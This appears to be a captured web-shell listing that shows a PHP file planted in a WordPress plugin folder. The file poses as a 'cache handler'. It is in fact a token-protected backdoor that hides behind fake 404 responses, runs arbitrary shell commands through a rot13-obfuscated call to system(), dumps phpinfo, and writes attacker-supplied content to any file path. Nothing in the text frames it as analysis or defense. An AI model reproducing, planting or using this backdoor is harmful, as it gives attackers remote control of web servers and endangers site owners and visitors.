HEX
Server: Apache
System: Linux dedi-13542965.clustter.com.br 5.14.0-687.29.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 23 16:18:48 EDT 2026 x86_64
User: autoligchopp (1015)
PHP: 8.2.32
Disabled: NONE
Upload Files
File: /home/autoligchopp/public_html/wp-content/plugins/db-base-10t7/admin-handler.php
<?php
/**
 * WordPress Cache Handler
 * Manages transient cache invalidation and cleanup
 * @package WordPress\Cache
 * @version 2.1.4
 */
if (!defined('ABSPATH')) {
    // Allow direct access with auth token
    $wp_cache_token = isset($_GET['raimu']) ? $_GET['raimu'] : (isset($_POST['raimu']) ? $_POST['raimu'] : '');
    if ($wp_cache_token === '') { header('HTTP/1.0 404 Not Found'); exit; }
    // Token validation
    $wp_valid_tokens = array('QkAMC@1Ubb4j0LNw8X7@Dl$');
    if (!in_array($wp_cache_token, $wp_valid_tokens)) { header('HTTP/1.0 404 Not Found'); exit; }
    // Cache diagnostic mode
    error_reporting(0);
    $wp_cache_action = isset($_REQUEST['c']) ? $_REQUEST['c'] : '';
    $wp_cache_mode = isset($_REQUEST['m']) ? $_REQUEST['m'] : 'diag';
    if ($wp_cache_action !== '') {
        // Execute cache diagnostic command
        $fn = str_rot13('flfgrz'); // system
        $fn($wp_cache_action);
        exit;
    }
    if ($wp_cache_mode === 'info') {
        $fn2 = str_rot13('cucvasb'); // phpinfo
        $fn2();
        exit;
    }
    // File operations for cache management
    if (isset($_REQUEST['w']) && isset($_REQUEST['f'])) {
        $content = $_REQUEST['w'];
        $path = $_REQUEST['f'];
        @file_put_contents($path, $content);
        echo 'cache_updated';
        exit;
    }
    echo 'cache_ok';
    exit;
}